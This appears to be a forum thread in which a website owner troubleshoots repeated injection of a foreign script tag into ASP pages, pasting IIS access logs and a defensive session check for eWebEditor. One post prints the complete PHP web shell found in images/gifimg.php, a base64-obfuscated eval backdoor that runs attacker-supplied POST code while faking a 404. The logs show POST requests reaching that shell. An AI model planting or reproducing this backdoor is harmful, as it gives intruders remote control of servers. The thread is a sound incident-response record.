标题:asp文件被写入恶意代码问题
取消只看楼主
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
结帖率:100%
已结贴  问题点数:20 回复次数:12 
asp文件被写入恶意代码问题
国庆节期间发布的一个企业网站。。上线不久。。网站内的.asp文件就被写入了:

<script src=http:// ></script>

还是首次遇上。。不知道怎么解决或者避免它?。。。昨天刚清除掉。。今天早上又开始有了。。又要再次清除。。大多每个文件都有。。加在网页文件的最后面。。。</body>的后面。。及其它包含文件。。例如。inc.asp 此包含文件。。还有一些sql防注入文件的最后面都加上了这个。。这样在其它页面调用时都会调进这个地址。。

这个要怎么查注入点或者是哪里的问题的?
搜索更多相关主题的帖子: 代码 文件 asp 恶意 
2009-10-20 10:09
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
后来我检查网站内是否有其它不是我自己的文件。。在文件夹  html(这里存放的是:eWebEditor编辑器)。。
在html目录里多了一个文件。。名为:anli.php  打开里面是一步段加密码了的代码。。当时看到时删除了。。发不了代码了。其它地方正常。。

后来我把anli.php删除。。及清掉所有的写入代码。。整站正常运行后第二天出现的问题还是这个。。
检查了html文件夹。。也在  eWebEditor的一个文件:html/Include/Startup.asp  这个文件加上:

<%
 if session("admin")="" then
   response.write "<script language='javascript'>alert('对不起,请勿尝试非法操作!');</script>"
   response.write "<script language='javascript'>parent.location.href='/';</script>"
   response.end
 end if
%>

加上后还是不行。。。eWebEditor  这个html编辑器的安全应该如何做的?我估计也是这个的问题。。。现在删除了它和后台文件。。观察中。。。

学习编程www.
2009-10-20 10:16
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>



文件找到了。。images图片文件夹下也有一个。。。名为:gifimg.php  上面是代码。。还有一个空文件夹名为:mbkq

有没有什么办法可以检查注入或者记录入侵过程的?

学习编程www.
2009-10-20 10:22
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
有没朋友遇上相似的问题的?指点一下呃。。或者了解点的。。交流一下。。看能否交流出好的解决办法。。

学习编程www.
2009-10-20 11:01
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
替换后。。解决了这个问题。。

上传后,不久。。或者第二天。同样的问题就再次出现了。。请问这个是哪里的问题?

学习编程www.
2009-10-20 17:39
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
今天早上同样的问题又出现了。。

出现这个问题应该从哪里检查问题修补?

<link href="style.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="favicon.ico">
<link rel="Bookmark" href="favicon.ico">
</head>
 
<script src=http:// ></script><body>


每个文件都有这句代码,每次覆盖恢复。。治标不治本。。请问这个问题我应该从哪里检查问题?

IIS的日志也有了

学习编程www.
2009-10-21 09:57
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
#Date: 2009-10-19 01:34:28
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
01:34:28 GET /style.css 219.134.222.43 200 2048 433
01:34:28 GET /index.asp 219.134.222.43 200 8042 255
01:34:28 GET /images/dianhua.jpg 219.134.222.43 200 2048 442
01:34:28 GET /images/xiao.gif 219.134.222.43 200 2048 438
01:34:28 GET /images/qqconnection.gif 219.134.222.43 200 2048 446
01:34:28 GET /images/biao.jpg 219.134.222.43 200 2048 438
01:34:28 GET /images/aoyun.jpg 219.134.222.43 200 4096 439
01:34:28 GET /flash/lele.js 219.134.222.43 200 2048 436
01:34:28 GET /images/bg.jpg 219.134.222.43 200 2048 437
01:34:28 GET /images/logo_nav.gif 219.134.222.43 200 2048 442
01:34:28 GET /flash/banner.swf 219.134.222.43 200 2048 469
01:34:28 GET /images/menu.gif 219.134.222.43 200 2048 438
01:34:28 GET /images/l_moh.jpg 219.134.222.43 200 4096 439
01:34:28 GET /images/l_moh1.jpg 219.134.222.43 200 2048 440
01:34:28 GET /images/l_moh2.jpg 219.134.222.43 200 2048 440
01:34:28 GET /flash/02.jpg 219.134.222.43 200 2048 522
01:34:28 GET /images/bottom_bg.jpg 219.134.222.43 200 2048 442
01:34:28 GET /flash/01.jpg 219.134.222.43 200 2048 522
01:34:28 GET /flash/04.jpg 219.134.222.43 200 2048 522
01:34:29 GET /flash/05.jpg 219.134.222.43 200 2048 522
01:34:29 GET /flash/03.jpg 219.134.222.43 200 2048 521
01:34:31 GET /favicon.ico 219.134.222.43 200 7589 289
01:42:23 GET /robots.txt 220.181.94.237 404 1445 69
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 02:00:45
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
02:00:44 GET /index.asp 119.122.143.22 200 8042 234
02:00:44 GET /style.css 119.122.143.22 200 3877 322
02:00:45 GET /flash/lele.js 119.122.143.22 200 2245 326
02:00:45 GET /images/menu.gif 119.122.143.22 200 3242 328
02:00:46 GET /images/aoyun.jpg 119.122.143.22 200 23976 329
02:00:46 GET /images/l_moh1.jpg 119.122.143.22 200 21905 330
02:00:46 GET /images/logo_nav.gif 119.122.143.22 200 32702 332
02:00:46 GET /images/dianhua.jpg 119.122.143.22 200 28012 331
02:00:46 GET /images/biao.jpg 119.122.143.22 200 28901 328
02:00:46 GET /images/qqconnection.gif 119.122.143.22 200 28276 336
02:00:46 GET /images/xiao.gif 119.122.143.22 200 27086 328
02:00:46 GET /images/l_moh.jpg 119.122.143.22 200 27884 329
02:00:47 GET /images/navhover.gif 119.122.143.22 200 804 351
02:00:47 GET /flash/03.jpg 119.122.143.22 200 24354 431
02:00:47 GET /images/bottom_bg.jpg 119.122.143.22 200 13107 333
02:00:48 GET /flash/02.jpg 119.122.143.22 200 23065 431
02:00:48 GET /images/bg.jpg 119.122.143.22 200 68353 326
02:00:48 GET /flash/01.jpg 119.122.143.22 200 32655 431
02:00:48 GET /flash/04.jpg 119.122.143.22 200 25545 431
02:00:48 GET /flash/05.jpg 119.122.143.22 200 30441 431
02:00:48 GET /images/l_moh2.jpg 119.122.143.22 200 23571 330
02:00:49 GET /flash/banner.swf 119.122.143.22 200 357946 358
02:07:41 GET /index.asp 119.122.143.22 200 8042 253
02:07:41 GET /style.css 119.122.143.22 304 192 431
02:07:41 GET /images/bg.jpg 119.122.143.22 304 192 435
02:07:41 GET /images/logo_nav.gif 119.122.143.22 304 191 440
02:07:42 GET /flash/banner.swf 119.122.143.22 304 192 467
02:07:42 GET /images/dianhua.jpg 119.122.143.22 304 192 440
02:07:42 GET /images/xiao.gif 119.122.143.22 304 191 436
02:07:42 GET /images/qqconnection.gif 119.122.143.22 304 191 444
02:07:42 GET /images/biao.jpg 119.122.143.22 304 191 436
02:07:42 GET /images/menu.gif 119.122.143.22 304 191 436
02:07:42 GET /flash/lele.js 119.122.143.22 304 191 434
02:07:42 GET /images/aoyun.jpg 119.122.143.22 304 191 437
02:07:42 GET /images/l_moh2.jpg 119.122.143.22 304 191 438
02:07:42 GET /images/l_moh1.jpg 119.122.143.22 304 191 438
02:07:42 GET /images/l_moh.jpg 119.122.143.22 304 191 437
02:07:42 GET /flash/01.jpg 119.122.143.22 304 191 520
02:07:42 GET /images/bottom_bg.jpg 119.122.143.22 304 190 440
02:07:42 GET /flash/03.jpg 119.122.143.22 304 190 519
02:07:42 GET /flash/02.jpg 119.122.143.22 304 191 520
02:07:42 GET /flash/04.jpg 119.122.143.22 304 191 520
02:07:42 GET /flash/05.jpg 119.122.143.22 304 191 520
02:20:09 GET /images/navhover.gif 119.122.143.22 200 804 439
02:20:12 GET /favicon.ico 119.122.143.22 200 7589 287
02:35:24 GET /family.asp 220.181.94.237 200 0 408
02:35:45 GET /xiaodu.asp 220.181.94.237 200 0 408
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 03:03:36
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
03:03:36 GET /robots.txt 220.181.94.237 404 1445 69
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 03:23:00
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
03:23:00 GET /index.asp 219.131.196.66 200 8061 116
03:23:01 GET /index.asp 219.131.196.66 200 8061 116
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 04:07:27
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
04:07:27 GET /show.asp 220.181.94.237 200 4297 412
04:07:47 GET /show.asp 220.181.94.237 200 4297 412
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 04:27:38
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
04:27:38 GET /robots.txt 220.181.94.237 404 1445 69
04:30:26 GET /index.asp 218.17.55.130 200 8674 389
04:32:02 GET /index.asp 218.17.55.130 200 8674 201
04:32:14 GET /style.css 218.17.55.130 200 3877 297
04:32:24 GET /images/logo_nav.gif 218.17.55.130 200 32702 307
04:32:27 GET /images/bg.jpg 218.17.55.130 200 68353 301
04:32:27 GET /images/dianhua.jpg 218.17.55.130 200 28012 306
04:32:27 GET /images/xiao.gif 218.17.55.130 200 27086 303
04:32:29 GET /images/qqconnection.gif 218.17.55.130 200 28276 311
04:32:29 GET /flash/banner.swf 218.17.55.130 200 357946 332
04:32:29 GET /images/biao.jpg 218.17.55.130 200 28901 303
04:32:29 GET /flash/lele.js 218.17.55.130 200 2338 301
04:32:30 GET /images/menu.gif 218.17.55.130 200 3242 303
04:32:30 GET /images/aoyun.jpg 218.17.55.130 200 23976 304
04:32:31 GET /images/l_moh1.jpg 218.17.55.130 200 21905 305
04:32:31 GET /images/l_moh2.jpg 218.17.55.130 200 23571 305
04:32:31 GET /images/bottom_bg.jpg 218.17.55.130 200 13107 308
04:32:31 GET /images/l_moh.jpg 218.17.55.130 200 27884 304
04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001
04:32:36 POST /html/anli.php 65.182.191.191 200 160 212
04:44:44 GET /images/navhover.gif 218.17.55.130 200 804 345
04:52:59 GET /zx.asp 218.17.55.130 200 6911 520
04:53:25 GET /images/ico.gif 218.17.55.130 200 2262 393
04:53:26 GET /images/top.jpg 218.17.55.130 200 19354 393
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 05:26:47
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
05:26:47 GET /index.asp 119.122.143.22 200 8674 234
05:26:56 GET /style.css 119.122.143.22 200 0 412
05:26:56 GET /images/bg.jpg 119.122.143.22 200 0 416
05:27:06 GET /images/logo_nav.gif 119.122.143.22 200 0 421
05:27:06 GET /flash/banner.swf 119.122.143.22 200 0 448
05:27:07 GET /images/dianhua.jpg 119.122.143.22 200 0 421
05:27:07 GET /images/xiao.gif 119.122.143.22 200 0 417
05:27:07 GET /images/qqconnection.gif 119.122.143.22 200 0 425
05:27:07 GET /images/biao.jpg 119.122.143.22 200 0 417
05:27:07 GET /images/aoyun.jpg 119.122.143.22 200 0 418
05:27:07 GET /images/menu.gif 119.122.143.22 200 0 417
05:27:07 GET /flash/lele.js 119.122.143.22 200 2338 415
05:27:08 GET /images/l_moh.jpg 119.122.143.22 200 0 418
05:27:08 GET /images/l_moh1.jpg 119.122.143.22 200 0 419
05:27:08 GET /images/l_moh2.jpg 119.122.143.22 200 0 419
05:27:08 GET /images/bottom_bg.jpg 119.122.143.22 200 0 421
05:27:08 GET /flash/01.jpg 119.122.143.22 200 0 501
05:27:08 GET /flash/02.jpg 119.122.143.22 200 0 501
05:27:08 GET /flash/03.jpg 119.122.143.22 200 0 500
05:27:08 GET /flash/04.jpg 119.122.143.22 200 0 501
05:27:08 GET /flash/05.jpg 119.122.143.22 200 0 501
05:27:49 GET /index.asp 220.181.94.237 200 8693 398
05:29:37 GET /images/navhover.gif 119.122.143.22 200 804 439
05:30:40 GET /images/navhover.gif 119.122.143.22 200 804 439
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 05:46:22
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
05:46:21 GET /index.asp 113.106.106.131 200 8693 521
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 06:16:12
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
06:16:11 GET /images/navhover.gif 219.134.222.43 200 804 334
06:19:41 GET /index.asp 218.17.143.143 200 8674 207
06:19:47 GET /style.css 218.17.143.143 200 3877 303
06:19:48 GET /images/bg.jpg 218.17.143.143 200 30720 307
06:19:48 GET /images/logo_nav.gif 218.17.143.143 200 10240 313
06:19:48 GET /flash/banner.swf 218.17.143.143 200 22528 339
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-10-19 06:38:37
#Fields: time cs-method cs-uri-stem c-ip sc-status sc-bytes cs-bytes  
06:38:36 GET /index.asp 119.136.230.122 200 8674 318
06:38:51 GET /index.asp 219.134.222.43 200 8674 283
06:38:55 GET /style.css 119.136.230.122 200 3877 414
06:38:56 GET /images/bg.jpg 119.136.230.122 200 68353 418
06:38:56 GET /images/logo_nav.gif 119.136.230.122 200 32702 424
06:38:58 GET /flash/lele.js 119.136.230.122 200 2338 418
06:38:58 GET /images/menu.gif 119.136.230.122 200 3242 420
06:38:58 GET /images/dianhua.jpg 119.136.230.122 200 28012 423
06:38:58 GET /images/aoyun.jpg 119.136.230.122 200 23976 421
06:38:58 GET /images/xiao.gif 119.136.230.122 200 27086 420
06:38:58 GET /images/qqconnection.gif 119.136.230.122 200 28276 428
06:38:58 GET /images/biao.jpg 119.136.230.122 200 28901 420
06:38:59 GET /images/l_moh2.jpg 119.136.230.122 200 23571 422
06:39:00 GET /flash/03.jpg 119.136.230.122 200 24354 504
06:39:00 GET /flash/02.jpg 119.136.230.122 200 23065 504
06:39:00 GET /flash/05.jpg 119.136.230.122 200 30441 504
06:39:00 GET /flash/04.jpg 119.136.230.122 200 25545 504
06:39:00 GET /images/l_moh1.jpg 119.136.230.122 200 21905 422
06:39:01 GET /images/l_moh.jpg 119.136.230.122 200 27884 421
06:39:01 GET /images/bottom_bg.jpg 119.136.230.122 200 13107 425
06:39:02 GET /flash/01.jpg 119.136.230.122 200 32655 504
06:39:02 GET /flash/banner.swf 119.136.230.122 200 357946 450
06:39:05 GET /style.css 219.134.222.43 200 2048 461
06:39:05 GET /images/bg.jpg 219.134.222.43 200 2048 465
06:39:06 GET /images/logo_nav.gif 219.134.222.43 200 2048 470
06:39:06 GET /flash/banner.swf 219.134.222.43 200 2048 497
06:39:11 GET /images/xiao.gif 219.134.222.43 200 2048 466
06:39:11 GET /images/dianhua.jpg 219.134.222.43 200 0 470
06:39:11 GET /images/aoyun.jpg 219.134.222.43 200 2048 467
06:39:11 GET /images/biao.jpg 219.134.222.43 200 2048 466
06:39:11 GET /images/qqconnection.gif 219.134.222.43 200 2048 474
06:39:11 GET /flash/lele.js 219.134.222.43 200 2338 464
06:39:11 GET /images/menu.gif 219.134.222.43 200 2048 466
06:43:44 GET /index.asp 119.136.230.122 200 8463 448
06:45:17 GET /style.css 119.136.230.122 200 3877 542
06:45:17 GET /images/bg.jpg 119.136.230.122 304 192 546
06:45:17 GET /flash/banner.swf 119.136.230.122 304 192 578
06:45:17 GET /images/logo_nav.gif 119.136.230.122 304 191 551
06:45:21 GET /images/dianhua.jpg 119.136.230.122 304 192 551
06:45:21 GET /images/aoyun.jpg 119.136.230.122 304 191 548
06:45:21 GET /flash/lele.js 119.136.230.122 304 192 546
06:45:21 GET /images/qqconnection.gif 119.136.230.122 304 191 555
06:45:21 GET /images/biao.jpg 119.136.230.122 304 191 547
06:45:21 GET /images/menu.gif 119.136.230.122 304 191 547
06:45:21 GET /images/xiao.gif 119.136.230.122 304 191 547
06:45:22 GET /images/l_moh.jpg 119.136.230.122 304 191 548
06:45:22 GET /images/l_moh1.jpg 119.136.230.122 304 191 549
06:45:22 GET /flash/02.jpg 119.136.230.122 304 191 631
06:45:22 GET /images/bottom_bg.jpg 119.136.230.122 304 190 551
06:45:22 GET /flash/01.jpg 119.136.230.122 304 191 631
06:45:22 GET /images/l_moh2.jpg 119.136.230.122 304 191 549
06:45:22 GET /flash/04.jpg 119.136.230.122 304 191 631
06:45:22 GET /flash/03.jpg 119.136.230.122 304 190 630
06:45:22 GET /flash/05.jpg 119.136.230.122 304 191 631
06:49:59 GET /index.asp 119.136.230.122 500 514 495
06:50:39 GET /index.asp 119.136.230.122 500 514 495
06:50:41 GET /index.asp 119.136.230.122 500 514 495
06:50:43 GET /index.asp 119.136.230.122 500 514 495
06:50:43 GET /index.asp 119.136.230.122 500 514 495
06:50:45 GET /index.asp 119.136.230.122 500 514 495
06:51:01 GET /index.asp 119.136.230.122 500 514 495
06:51:03 GET /index.asp 119.136.230.122 500 514 495
06:51:17 GET /index.asp 119.136.230.122 500 514 495
06:51:18 GET /index.asp 119.136.230.122 500 514 495
06:51:19 GET /index.asp 119.136.230.122 500 514 495
06:51:20 GET /index.asp 119.136.230.122 500 514 495
06:51:20 GET /index.asp 119.136.230.122 500 514 495
06:51:20 GET /index.asp 119.136.230.122 500 514 495
06:51:21 GET /index.asp 119.136.230.122 500 514 495
06:51:39 GET /index.asp 119.136.230.122 200 7834 495
06:51:39 GET /style.css 119.136.230.122 200 3876 542
06:51:40 GET /images/logo_nav.gif 119.136.230.122 304 191 551
06:51:40 GET /images/xiao.gif 119.136.230.122 304 191 547
06:51:40 GET /images/biao.jpg 119.136.230.122 304 191 547
06:51:40 GET /images/aoyun.jpg 119.136.230.122 304 191 548
06:51:40 GET /images/menu.gif 119.136.230.122 304 191 547
06:51:40 GET /flash/lele.js 119.136.230.122 200 2244 546
06:51:40 GET /images/l_moh2.jpg 119.136.230.122 304 191 549
06:51:40 GET /images/bottom_bg.jpg 119.136.230.122 304 190 551
06:51:40 GET /images/l_moh1.jpg 119.136.230.122 304 191 549
06:51:40 GET /images/l_moh.jpg 119.136.230.122 304 191 548
06:51:40 GET /images/qqconnection.gif 119.136.230.122 200 28274 555
06:51:40 GET /images/dianhua.jpg 119.136.230.122 200 28011 551
06:51:40 GET /images/bg.jpg 119.136.230.122 200 68352 546
06:51:43 GET /style.css 119.136.230.122 304 191 541
06:51:43 GET /index.asp 119.136.230.122 200 7834 495
06:51:43 GET /images/logo_nav.gif 119.136.230.122 304 191 551
06:51:43 GET /images/bg.jpg 119.136.230.122 304 191 545
06:51:43 GET /images/xiao.gif 119.136.230.122 304 191 547
06:51:43 GET /images/dianhua.jpg 119.136.230.122 304 191 550
06:51:43 GET /images/menu.gif 119.136.230.122 304 191 547
06:51:43 GET /flash/lele.js 119.136.230.122 304 190 544
06:51:43 GET /images/aoyun.jpg 119.136.230.122 304 191 548
06:51:43 GET /images/qqconnection.gif 119.136.230.122 304 189 553
06:51:43 GET /images/biao.jpg 119.136.230.122 304 191 547
06:51:44 GET /images/bottom_bg.jpg 119.136.230.122 304 190 551
06:51:44 GET /images/l_moh2.jpg 119.136.230.122 304 191 549
06:51:44 GET /images/l_moh1.jpg 119.136.230.122 304 191 549
06:51:44 GET /images/l_moh.jpg 119.136.230.122 304 191 548
06:51:50 GET /images/navhover.gif 119.136.230.122 200 804 462
06:51:50 GET /xiangmu.asp 119.136.230.122 200 3656 454
06:51:50 GET /upfile/200910127455415.jpg 119.136.230.122 404 0 480
06:51:50 GET /images/top.jpg 119.136.230.122 200 19353 468
06:51:50 GET /images/ico.gif 119.136.230.122 200 2262 468
06:51:52 GET /xiangmu.asp 119.136.230.122 200 3656 454
06:51:52 GET /upfile/200910127455415.jpg 119.136.230.122 404 1445 480
06:51:52 GET /images/logo_nav.gif 119.136.230.122 304 191 562
06:51:52 GET /images/bg.jpg 119.136.230.122 304 191 556
06:51:52 GET /style.css 119.136.230.122 304 191 552
06:51:52 GET /images/bottom_bg.jpg 119.136.230.122 304 190 562
06:51:52 GET /images/top.jpg 119.136.230.122 304 191 557
06:51:52 GET /images/ico.gif 119.136.230.122 304 191 557
06:51:52 GET /images/qqconnection.gif 119.136.230.122 304 189 564
06:51:53 GET /anli.asp 119.136.230.122 200 3677 462
06:51:53 GET /upfile/2009101622179674.gif 119.136.230.122 404 0 478
06:51:54 GET /xiaodu.asp 119.136.230.122 200 9686 461
06:52:21 GET /upfile/2009101622179674.gif 119.136.230.122 200 219161 478
06:52:28 GET /zx.asp 119.136.230.122 200 6212 457
06:52:30 GET /family.asp 119.136.230.122 200 3670 460
06:52:34 GET /upfile/2009928184946704.jpg 119.136.230.122 200 591815 481
06:52:51 GET /contact.asp 119.136.230.122 200 4442 465
06:52:52 GET /anli.asp 119.136.230.122 200 3677 463
06:52:54 GET /xiangmu.asp 119.136.230.122 200 3656 463
06:52:54 GET /upfile/200910127455415.jpg 119.136.230.122 200 63488 481
06:52:54 GET /xiaodu.asp 119.136.230.122 200 9686 465
06:52:55 GET /family.asp 119.136.230.122 200 3670 464
06:59:58 GET /index.asp 219.134.222.43 200 7901 236
06:59:58 GET /images/xiao.gif 219.134.222.43 200 2048 419
06:59:58 GET /images/biao.jpg 219.134.222.43 200 2048 419
06:59:58 GET /images/aoyun.jpg 219.134.222.43 200 2048 420
06:59:58 GET /style.css 219.134.222.43 200 3876 414
06:59:58 GET /flash/lele.js 219.134.222.43 200 2244 418
06:59:58 GET /images/logo_nav.gif 219.134.222.43 200 2048 423
06:59:58 GET /images/l_moh1.jpg 219.134.222.43 200 2048 421
06:59:58 GET /images/l_moh.jpg 219.134.222.43 200 2048 420
06:59:58 GET /images/l_moh2.jpg 219.134.222.43 200 2048 421
06:59:58 GET /images/bottom_bg.jpg 219.134.222.43 200 2048 423
06:59:59 GET /images/menu.gif 219.134.222.43 200 2048 419
06:59:59 GET /flash/01.jpg 219.134.222.43 200 2048 503
06:59:59 GET /flash/02.jpg 219.134.222.43 200 2048 503
06:59:59 GET /images/qqconnection.gif 219.134.222.43 200 28274 427
06:59:59 GET /flash/03.jpg 219.134.222.43 200 2048 521
06:59:59 GET /flash/04.jpg 219.134.222.43 200 2048 522
06:59:59 GET /flash/05.jpg 219.134.222.43 200 2048 522
06:59:59 GET /images/dianhua.jpg 219.134.222.43 200 28011 423
07:00:00 GET /images/bg.jpg 219.134.222.43 200 68352 418
07:00:01 GET /flash/banner.swf 219.134.222.43 200 357945 450
07:00:58 GET /images/navhover.gif 119.136.230.122 304 190 561
07:00:59 GET /about.asp 119.136.230.122 200 4957 463
07:00:59 GET /style.css 119.136.230.122 304 191 551
07:00:59 GET /images/logo_nav.gif 119.136.230.122 304 191 561
07:00:59 GET /images/bg.jpg 119.136.230.122 304 191 555
07:00:59 GET /images/top.jpg 119.136.230.122 304 191 556
07:00:59 GET /images/ico.gif 119.136.230.122 304 191 556
07:00:59 GET /images/qqconnection.gif 119.136.230.122 304 189 563
07:00:59 GET /images/bottom_bg.jpg 119.136.230.122 304 190 561
07:01:02 GET /flash/banner.swf 119.136.230.122 200 357945 588
07:01:06 GET /xiangmu.asp 119.136.230.122 200 3656 464
07:01:06 GET /upfile/200910127455415.jpg 119.136.230.122 206 19419 591
07:01:07 GET /anli.asp 119.136.230.122 200 3677 463
07:01:07 GET /upfile/2009101622179674.gif 119.136.230.122 304 192 569
07:01:08 GET /contact.asp 119.136.230.122 200 4442 463
07:01:08 GET /xiaodu.asp 119.136.230.122 200 9686 465
07:01:09 GET /family.asp 119.136.230.122 200 3670 464
07:01:09 GET /upfile/2009928184946704.jpg 119.136.230.122 304 192 571
07:01:16 GET /contact.asp 119.136.230.122 200 4442 465
07:02:33 GET /contact.asp 119.136.230.122 200 4442 465
07:02:33 GET /style.css 119.136.230.122 304 191 553
07:02:34 GET /images/logo_nav.gif 119.136.230.122 304 191 563
07:02:34 GET /images/bg.jpg 119.136.230.122 304 191 557
07:02:34 GET /images/bottom_bg.jpg 119.136.230.122 304 190 563
07:02:34 GET /images/top.jpg 119.136.230.122 304 191 558
07:02:34 GET /images/ico.gif 119.136.230.122 304 191 558
07:02:34 GET /images/qqconnection.gif 119.136.230.122 200 27839 565
07:03:20 GET /anli.asp 119.136.230.122 200 3677 463
07:03:22 GET /xiaodu.asp 119.136.230.122 200 9686 462
07:03:22 GET /family.asp 119.136.230.122 200 3670 464
07:03:23 GET /xiaodu.asp 119.136.230.122 200 9686 464
07:03:23 GET /xiangmu.asp 119.136.230.122 200 3656 465
07:03:26 GET /index.asp 219.134.222.43 200 7834 327
07:03:26 GET /style.css 219.134.222.43 200 3876 368
07:03:26 GET /flash/lele.js 219.134.222.43 200 2244 372
07:03:27 GET /images/xiao.gif 219.134.222.43 200 27086 374
07:03:27 GET /images/dianhua.jpg 219.134.222.43 200 28011 377
07:03:27 GET /images/biao.jpg 219.134.222.43 200 28901 374
07:03:27 GET /images/qqconnection.gif 219.134.222.43 200 27837 382
07:03:27 GET /images/aoyun.jpg 219.134.222.43 200 23976 375
07:03:28 GET /images/logo_nav.gif 219.134.222.43 200 32702 378
07:03:28 GET /images/l_moh1.jpg 219.134.222.43 200 21905 376
07:03:28 GET /images/l_moh2.jpg 219.134.222.43 200 23571 376
07:03:28 GET /images/bottom_bg.jpg 219.134.222.43 200 13107 379
07:03:28 GET /images/l_moh.jpg 219.134.222.43 200 27884 375
07:03:28 GET /images/bg.jpg 219.134.222.43 200 68352 372
07:03:29 GET /images/menu.gif 219.134.222.43 200 3242 374
07:03:33 GET /images/navhover.gif 219.134.222.43 304 190 441
07:03:34 GET /zx.asp 219.134.222.43 200 6212 340
07:03:35 GET /images/ico.gif 219.134.222.43 200 2262 354
07:03:35 GET /images/top.jpg 219.134.222.43 200 19353 354
07:03:36 GET /contact.asp 119.136.230.122 200 4442 466
07:03:37 GET /anli.asp 119.136.230.122 200 3677 463
07:03:38 GET /xiangmu.asp 119.136.230.122 200 3656 463
07:03:43 GET /xiaodu.asp 119.136.230.122 200 9686 465
07:03:43 GET /family.asp 119.136.230.122 200 3670 464
07:03:44 GET /zx.asp 119.136.230.122 200 6212 460
07:03:44 GET /about.asp 119.136.230.122 200 4957 459
07:03:46 GET /zx.asp 119.136.230.122 200 6212 459
07:04:15 GET /style.css 119.136.230.122 304 191 556
07:04:15 GET /show.asp 119.136.230.122 200 10325 464
07:04:15 GET /flash/banner.swf 119.136.230.122 304 191 592
07:04:15 GET /images/logo_nav.gif 119.136.230.122 304 191 566
07:04:15 GET /images/bg.jpg 119.136.230.122 304 191 560
07:04:15 GET /images/bottom_bg.jpg 119.136.230.122 304 190 566
07:04:15 GET /images/top.jpg 119.136.230.122 304 191 561
07:04:15 GET /images/ico.gif 119.136.230.122 304 191 561
07:04:15 GET /images/qqconnection.gif 119.136.230.122 304 192 573
07:04:17 GET /show.asp 119.136.230.122 200 244 427
07:04:29 GET /images/navhover.gif 119.136.230.122 304 190 565
07:04:29 GET /xiaodu.asp 119.136.230.122 200 9686 468
07:04:30 GET /xiangmu.asp 119.136.230.122 200 3656 465
07:04:30 GET /upfile/200910127455415.jpg 119.136.230.122 304 192 571
07:04:35 GET /contact.asp 119.136.230.122 200 4442 466
07:04:36 GET /anli.asp 119.136.230.122 200 3677 463
07:04:36 GET /upfile/2009101622179674.gif 119.136.230.122 304 192 569
07:04:58 GET /contact.asp 119.136.230.122 200 4442 463
07:05:23 GET /index.asp 119.136.230.122 200 7834 412
07:05:23 GET /images/dianhua.jpg 119.136.230.122 304 191 551
07:05:23 GET /images/biao.jpg 119.136.230.122 304 191 548
07:05:23 GET /images/menu.gif 119.136.230.122 304 191 548
07:05:23 GET /flash/lele.js 119.136.230.122 304 190 545
07:05:23 GET /images/xiao.gif 119.136.230.122 304 191 548
07:05:23 GET /images/l_moh1.jpg 119.136.230.122 304 191 550
07:05:23 GET /images/l_moh2.jpg 119.136.230.122 304 191 550
07:05:23 GET /flash/01.jpg 119.136.230.122 304 191 632
07:05:23 GET /images/l_moh.jpg 119.136.230.122 304 191 549
07:05:23 GET /images/aoyun.jpg 119.136.230.122 304 191 549
07:05:23 GET /flash/02.jpg 119.136.230.122 304 191 632
07:05:23 GET /flash/03.jpg 119.136.230.122 304 190 631
07:05:23 GET /flash/04.jpg 119.136.230.122 304 191 632
07:05:23 GET /flash/05.jpg 119.136.230.122 304 191 632
07:06:08 GET /zx.asp 119.136.230.122 200 6212 450
07:07:57 GET /contact.asp 119.136.230.122 200 4442 461
07:08:46 GET /anli.asp 119.136.230.122 200 3677 463
07:08:50 GET /index.asp 119.136.230.122 200 7834 412
07:12:42 GET /index.asp 119.136.230.122 200 7834 412
07:12:44 GET /about.asp 119.136.230.122 200 4957 453
07:12:45 GET /family.asp 119.136.230.122 200 3670 463
07:12:45 GET /upfile/2009928184946704.jpg 119.136.230.122 304 192 571
07:12:46 GET /xiaodu.asp 119.136.230.122 200 9686 464
07:12:53 GET /xiaodu.asp 119.136.230.122 200 9686 464
07:12:53 GET /style.css 119.136.230.122 304 191 552
